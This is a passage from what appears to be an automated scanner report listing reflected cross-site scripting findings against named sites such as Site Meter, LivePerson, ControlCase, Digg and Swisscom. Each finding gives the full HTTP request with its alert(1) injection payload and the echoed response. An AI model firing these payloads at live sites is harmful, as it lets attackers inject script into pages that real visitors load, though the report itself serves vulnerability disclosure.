GET /js/counter.js?site=s18neumedia45a9b'%3balert(1)//de697cd2bf8 HTTP/1.1
Host: s18.sitemeter.com
Proxy-Connection: keep-alive
Referer: http://www.neudesicmediagroup.com/Advertising.aspx?site=Silverlight
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Sun, 24 Apr 2011 15:57:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3pEXTRA.xml", CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Content-Length: 7320
Content-Type: application/x-javascript
Expires: Sun, 24 Apr 2011 16:07:48 GMT
Set-Cookie: IP=173%2E193%2E214%2E243; path=/js
Cache-control: private

// Copyright (c)2006 Site Meter, Inc.
// <![CDATA[
var SiteMeter =
{
   init:function( sCodeName, sServerName, sSecurityCode )
   {
       SiteMeter.CodeName = sCodeName;
       SiteMeter.ServerName = sServe
...[SNIP]...
.addEventListener(sEvent, func, false);
       else
           if (obj.attachEvent)
            obj.attachEvent( "on"+sEvent, func );
           else
               return false;
       return true;
   }

}

SiteMeter.init('s18neumedia45a9b';alert(1)//de697cd2bf8', 's18.sitemeter.com', '');

var g_sLastCodeName = 's18neumedia45a9b';alert(1)//de697cd2bf8';
// ]]>
...[SNIP]...

6.228. http://s41.sitemeter.com/js/counter.asp [site parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://s41.sitemeter.com
Path:   /js/counter.asp

Issue detail

The value of the site request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 86aae'%3balert(1)//a7d720b4eda was submitted in the site parameter. This input was echoed as 86aae';alert(1)//a7d720b4eda in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js/counter.asp?site=s41TheDotNetFactory86aae'%3balert(1)//a7d720b4eda HTTP/1.1
Host: s41.sitemeter.com
Proxy-Connection: keep-alive
Referer: http://www.identitymanagement.com/?_kk=identity%20management&_kt=d37d8c67-315a-4919-abfc-41011051bd9e&gclid=CJvKs4D1tagCFeJ95Qodoi78Dg
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 24 Apr 2011 19:45:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3pEXTRA.xml", CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Content-Length: 7336
Content-Type: application/x-javascript
Expires: Sun, 24 Apr 2011 19:55:31 GMT
Set-Cookie: IP=173%2E193%2E214%2E243; path=/js
Cache-control: private

// Copyright (c)2006 Site Meter, Inc.
// <![CDATA[
var SiteMeter =
{
   init:function( sCodeName, sServerName, sSecurityCode )
   {
       SiteMeter.CodeName = sCodeName;
       SiteMeter.ServerName = sServe
...[SNIP]...
tListener(sEvent, func, false);
       else
           if (obj.attachEvent)
            obj.attachEvent( "on"+sEvent, func );
           else
               return false;
       return true;
   }

}

SiteMeter.init('s41thedotnetfactory86aae';alert(1)//a7d720b4eda', 's41.sitemeter.com', '');

var g_sLastCodeName = 's41thedotnetfactory86aae';alert(1)//a7d720b4eda';
// ]]>
...[SNIP]...

6.229. http://s41.sitemeter.com/js/counter.js [site parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://s41.sitemeter.com
Path:   /js/counter.js

Issue detail

The value of the site request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5f94a'%3balert(1)//a8f59e446fd was submitted in the site parameter. This input was echoed as 5f94a';alert(1)//a8f59e446fd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /js/counter.js?site=s41TheDotNetFactory5f94a'%3balert(1)//a8f59e446fd HTTP/1.1
Host: s41.sitemeter.com
Proxy-Connection: keep-alive
Referer: http://www.identitymanagement.com/?_kk=identity%20management&_kt=d37d8c67-315a-4919-abfc-41011051bd9e&gclid=CJvKs4D1tagCFeJ95Qodoi78Dg
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Sun, 24 Apr 2011 19:45:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3pEXTRA.xml", CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Content-Length: 7336
Content-Type: application/x-javascript
Expires: Sun, 24 Apr 2011 19:55:31 GMT
Set-Cookie: IP=173%2E193%2E214%2E243; path=/js
Cache-control: private

// Copyright (c)2006 Site Meter, Inc.
// <![CDATA[
var SiteMeter =
{
   init:function( sCodeName, sServerName, sSecurityCode )
   {
       SiteMeter.CodeName = sCodeName;
       SiteMeter.ServerName = sServe
...[SNIP]...
tListener(sEvent, func, false);
       else
           if (obj.attachEvent)
            obj.attachEvent( "on"+sEvent, func );
           else
               return false;
       return true;
   }

}

SiteMeter.init('s41thedotnetfactory5f94a';alert(1)//a8f59e446fd', 's41.sitemeter.com', '');

var g_sLastCodeName = 's41thedotnetfactory5f94a';alert(1)//a8f59e446fd';
// ]]>
...[SNIP]...

6.230. http://sales.liveperson.net/visitor/addons/deploy.asp [site parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://sales.liveperson.net
Path:   /visitor/addons/deploy.asp

Issue detail

The value of the site request parameter is copied into a JavaScript rest-of-line comment. The payload 9b7a1%0aalert(1)//ac1b7357dd was submitted in the site parameter. This input was echoed as 9b7a1
alert(1)//ac1b7357dd
in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /visitor/addons/deploy.asp?site=312544749b7a1%0aalert(1)//ac1b7357dd&d_id=truecredit-sales HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.truecredit.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LivePersonID=LP i=16601209214853,d=1303177644; HumanClickACTIVE=1303647176210

Response

HTTP/1.1 500 Internal Server Error
Date: Mon, 25 Apr 2011 00:53:34 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Content-Length: 458
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCSBCSATT=KBBBIPGCCIHBJNFHNMEJKIBA; path=/
Cache-control: private

//Plugins for site 312544749b7a1
alert(1)//ac1b7357dd

<font face="Arial" size=2>
<p>Server.MapPath()</font> <font face="Arial" size=2>error 'ASP 0174 : 80004005'</font>
<p>
<font face="Arial" size=2
...[SNIP]...

6.231. http://seal.controlcase.com/index.php [cId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://seal.controlcase.com
Path:   /index.php

Issue detail

The value of the cId request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c8bb5"><script>alert(1)</script>d4f9df9ce9 was submitted in the cId parameter. This input was echoed as c8bb5\"><script>alert(1)</script>d4f9df9ce9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index.php?page=showCert&cId=3063048179c8bb5"><script>alert(1)</script>d4f9df9ce9 HTTP/1.1
Host: seal.controlcase.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 17:11:09 GMT
Server: Apache/2.0.55 (Win32)
Set-Cookie: PHPSESSID=eb69c911482ce6d4c63b05bbd75f554e; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 4593
Content-Type: text/html; charset=ISO-8859-1

<head>
   <title>Controlcase</title>
</head>
<link rel="stylesheet" type="text/css" href="templates/css/style.css" />

<form name="showCert" method='POST' action='index.php?page=showCert'>
<Body o
...[SNIP]...
<a href="index.php?page=issueForm&clientid=3063048179c8bb5\"><script>alert(1)</script>d4f9df9ce9">
...[SNIP]...

6.232. http://seal.controlcase.com/index.php [clientid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://seal.controlcase.com
Path:   /index.php

Issue detail

The value of the clientid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c7113"><script>alert(1)</script>fd9779f0e3a was submitted in the clientid parameter. This input was echoed as c7113\"><script>alert(1)</script>fd9779f0e3a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index.php?page=issueForm&clientid=3063048179c7113"><script>alert(1)</script>fd9779f0e3a HTTP/1.1
Host: seal.controlcase.com
Proxy-Connection: keep-alive
Referer: http://seal.controlcase.com/index.php?page=showCert&cId=3063048179
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=bdd7e08025b8d8869d5df96b3c45398b

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 17:11:17 GMT
Server: Apache/2.0.55 (Win32)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 3118
Content-Type: text/html; charset=ISO-8859-1

<head>
   <title>Controlcase</title>
</head>
<link rel="stylesheet" type="text/css" href="templates/css/style.css" />
<div style="width:690px;height:570px; overflow:scroll">
<form name="issueForm"
...[SNIP]...
<input type="hidden" name="clientid" value="3063048179c7113\"><script>alert(1)</script>fd9779f0e3a">
...[SNIP]...

6.233. http://seal.controlcase.com/index.php [clientid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://seal.controlcase.com
Path:   /index.php

Issue detail

The value of the clientid request parameter is copied into an HTML comment. The payload 667a7--><script>alert(1)</script>141f31e6974 was submitted in the clientid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index.php?page=issueForm&clientid=3063048179667a7--><script>alert(1)</script>141f31e6974 HTTP/1.1
Host: seal.controlcase.com
Proxy-Connection: keep-alive
Referer: http://seal.controlcase.com/index.php?page=showCert&cId=3063048179
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=bdd7e08025b8d8869d5df96b3c45398b

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 17:11:21 GMT
Server: Apache/2.0.55 (Win32)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 3118
Content-Type: text/html; charset=ISO-8859-1

<head>
   <title>Controlcase</title>
</head>
<link rel="stylesheet" type="text/css" href="templates/css/style.css" />
<div style="width:690px;height:570px; overflow:scroll">
<form name="issueForm"
...[SNIP]...
<!--a href="index.php?page=showCert&cId=3063048179667a7--><script>alert(1)</script>141f31e6974">
...[SNIP]...

6.234. http://seal.controlcase.com/index.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://seal.controlcase.com
Path:   /index.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 6eaec%3balert(1)//354b7c45587 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6eaec;alert(1)//354b7c45587 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index.php?page=issueForm&clientid=%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000068)%3C/scrip/6eaec%3balert(1)//354b7c45587t%3E HTTP/1.1
Host: seal.controlcase.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=bdd7e08025b8d8869d5df96b3c45398b; __utmz=208121856.1303664485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208121856.1998732058.1303664485.1303664485.1303664485.1; __utmc=208121856; __utmb=208121856.10.10.1303664485

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 17:19:36 GMT
Server: Apache/2.0.55 (Win32)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 3223
Content-Type: text/html; charset=ISO-8859-1

<head>
   <title>Controlcase</title>
</head>
<link rel="stylesheet" type="text/css" href="templates/css/style.css" />
<div style="width:690px;height:570px; overflow:scroll">
<form name="issueForm"
...[SNIP]...
</scrip/6eaec;alert(1)//354b7c45587t>
...[SNIP]...

6.235. http://seal.controlcase.com/index.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://seal.controlcase.com
Path:   /index.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload f14c8--><script>alert(1)</script>d9f763ed9d3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index.php?page=issueForm&clientid=306304/f14c8--><script>alert(1)</script>d9f763ed9d38179 HTTP/1.1
Host: seal.controlcase.com
Proxy-Connection: keep-alive
Referer: http://seal.controlcase.com/index.php?page=showCert&cId=3063048179
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=bdd7e08025b8d8869d5df96b3c45398b

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 17:13:28 GMT
Server: Apache/2.0.55 (Win32)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 3121
Content-Type: text/html; charset=ISO-8859-1

<head>
   <title>Controlcase</title>
</head>
<link rel="stylesheet" type="text/css" href="templates/css/style.css" />
<div style="width:690px;height:570px; overflow:scroll">
<form name="issueForm"
...[SNIP]...
<!--a href="index.php?page=showCert&cId=306304/f14c8--><script>alert(1)</script>d9f763ed9d38179">
...[SNIP]...

6.236. http://seal.controlcase.com/index.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://seal.controlcase.com
Path:   /index.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ab72c"><script>alert(1)</script>3b523f0ee7e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ab72c\"><script>alert(1)</script>3b523f0ee7e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index.php?page=issueForm&clientid=306304/ab72c"><script>alert(1)</script>3b523f0ee7e8179 HTTP/1.1
Host: seal.controlcase.com
Proxy-Connection: keep-alive
Referer: http://seal.controlcase.com/index.php?page=showCert&cId=3063048179
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=bdd7e08025b8d8869d5df96b3c45398b

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 17:13:24 GMT
Server: Apache/2.0.55 (Win32)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 3121
Content-Type: text/html; charset=ISO-8859-1

<head>
   <title>Controlcase</title>
</head>
<link rel="stylesheet" type="text/css" href="templates/css/style.css" />
<div style="width:690px;height:570px; overflow:scroll">
<form name="issueForm"
...[SNIP]...
<input type="hidden" name="clientid" value="306304/ab72c\"><script>alert(1)</script>3b523f0ee7e8179">
...[SNIP]...

6.237. http://services.digg.com/1.0/endpoint [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://services.digg.com
Path:   /1.0/endpoint

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 3a912<script>alert(1)</script>d3a0c5c15cb was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /1.0/endpoint?method=story.getAll&link=http%3A%2F%2Fwww.pcworld.com%2Farticle%2F149142%2Fidentity_theft_monitoring_services_called_waste.html&type=javascript&callback=gig_pc_digg_1303674277175_76907383464276793a912<script>alert(1)</script>d3a0c5c15cb HTTP/1.1
Host: services.digg.com
Proxy-Connection: keep-alive
Referer: http://www.pcworld.com/article/149142/identity_theft_monitoring_services_called_waste.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 171
X-RateLimit-Current: 118
Etag: "224ac512a3f10d53535177cc954c170cf7f486fe"
Server: TornadoServer/0.1
Content-Type: text/javascript
X-RateLimit-Max: 5000
X-RateLimit-Reset: 3185

gig_pc_digg_1303674277175_76907383464276793a912<script>alert(1)</script>d3a0c5c15cb({
"count": 0,
"timestamp": 1303674685,
"total": 0,
"stories": []
});

6.238. http://services.digg.com/1.0/endpoint [method parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://services.digg.com
Path:   /1.0/endpoint

Issue detail

The value of the method request parameter is copied into the HTML document as plain text between tags. The payload d3adc<script>alert(1)</script>57d25961379 was submitted in the method parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /1.0/endpoint?method=story.getAlld3adc<script>alert(1)</script>57d25961379&link=http%3A%2F%2Fwww.pcworld.com%2Farticle%2F149142%2Fidentity_theft_monitoring_services_called_waste.html&type=javascript&callback=gig_pc_digg_1303674277175_7690738346427679 HTTP/1.1
Host: services.digg.com
Proxy-Connection: keep-alive
Referer: http://www.pcworld.com/article/149142/identity_theft_monitoring_services_called_waste.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
Content-Length: 220
X-RateLimit-Current: 29
Server: TornadoServer/0.1
Content-Type: text/javascript
X-RateLimit-Max: 5000
X-RateLimit-Reset: 3291

gig_pc_digg_1303674277175_7690738346427679({
"status": 403,
"timestamp": 1303674579,
"message": "No such method 'story.getAlld3adc<script>alert(1)</script>57d25961379' on version 1.0",
"code": 1052
});

6.239. http://services.digg.com/1.0/endpoint [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://services.digg.com
Path:   /1.0/endpoint

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 568a7<script>alert(1)</script>3f54c9871ad was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /1.0/endpoint?method=story.getAll&link=http%3A%2F%2Fwww.pcworld.com%2Farticle%2F149142%2Fidentity_theft_monitoring_services_called_waste.html&type=javascript&callback=gig_pc_digg_1303674277175_7690738346427679&568a7<script>alert(1)</script>3f54c9871ad=1 HTTP/1.1
Host: services.digg.com
Proxy-Connection: keep-alive
Referer: http://www.pcworld.com/article/149142/identity_theft_monitoring_services_called_waste.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
Content-Length: 193
X-RateLimit-Current: 148
Server: TornadoServer/0.1
Content-Type: text/javascript
X-RateLimit-Max: 5000
X-RateLimit-Reset: 3150

gig_pc_digg_1303674277175_7690738346427679({
"status": 403,
"timestamp": 1303674720,
"message": "Unknown argument 568a7<script>alert(1)</script>3f54c9871ad",
"code": 1001
});

6.240. http://services.digg.com/favicon.ico [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://services.digg.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload b4fbd<script>alert(1)</script>faeb30ba68d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico?b4fbd<script>alert(1)</script>faeb30ba68d=1 HTTP/1.1
Host: services.digg.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
Content-Length: 148
X-RateLimit-Current: 275
Server: TornadoServer/0.1
Content-Type: application/json
X-RateLimit-Max: 5000
X-RateLimit-Reset: 674

{
"status": 403,
"timestamp": 1303677196,
"message": "Unknown argument b4fbd<script>alert(1)</script>faeb30ba68d",
"code": 1001
}

6.241. http://swisscomonlineshop.sso.bluewin.ch/onlineshop/Pages/Category/Category.aspx [drilldown parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://swisscomonlineshop.sso.bluewin.ch
Path:   /onlineshop/Pages/Category/Category.aspx

Issue detail

The value of the drilldown request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 88551"%20a%3db%2029442d524fb was submitted in the drilldown parameter. This input was echoed as 88551" a=b 29442d524fb in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /onlineshop/Pages/Category/Category.aspx?cat=OS_Festnetz&subcat=OS_Telefone&drilldown=388551"%20a%3db%2029442d524fb&lang=EN HTTP/1.1
Host: swisscomonlineshop.sso.bluewin.ch
Proxy-Connection: keep-alive
Referer: http://en.swisscom.ch/residential
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 18:53:51 GMT
Set-Cookie: JSESSIONID=31B156D6D83364AFCF85FB8FCC41FE81; Path=/
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html;charset=utf-8
Connection: close
Content-Length: 78112


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Fixed netw
...[SNIP]...
<a href="http://swisscomonlineshop.sso.bluewin.ch/onlineshop/Pages/Category/Category.aspx?cat=OS_Festnetz&subcat=OS_Telefone&drilldown=388551" a=b 29442d524fb&lang=de&plang=de">
...[SNIP]...

6.242. http://swisscomonlineshop.sso.bluewin.ch/onlineshop/Pages/Category/Category.aspx [lang parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://swisscomonlineshop.sso.bluewin.ch
Path:   /onlineshop/Pages/Category/Category.aspx

Issue detail

The value of the lang request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 20be5"%20a%3db%20320dbbfca08 was submitted in the lang parameter. This input was echoed as 20be5" a=b 320dbbfca08 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /onlineshop/Pages/Category/Category.aspx?cat=OS_Festnetz&subcat=OS_Telefone&drilldown=3&lang=EN20be5"%20a%3db%20320dbbfca08 HTTP/1.1
Host: swisscomonlineshop.sso.bluewin.ch
Proxy-Connection: keep-alive
Referer: http://en.swisscom.ch/residential
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 18:55:24 GMT
Set-Cookie: JSESSIONID=23578C8BDDD389C0502A592B6846A8ED; Path=/
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html;charset=utf-8
Connection: close
Content-Length: 77136


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Fixed netw
...[SNIP]...
<a href="/onlineshop/Pages/Products/Products.aspx?cat=OS_Festnetz&subcat=OS_Telefone&drilldown=7&lang=EN20be5" a=b 320dbbfca08&subsubcat=OS_EcomodePlus">
...[SNIP]...

6.243. http://swisscomonlineshop.sso.bluewin.ch/onlineshop/Pages/Category/Category.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
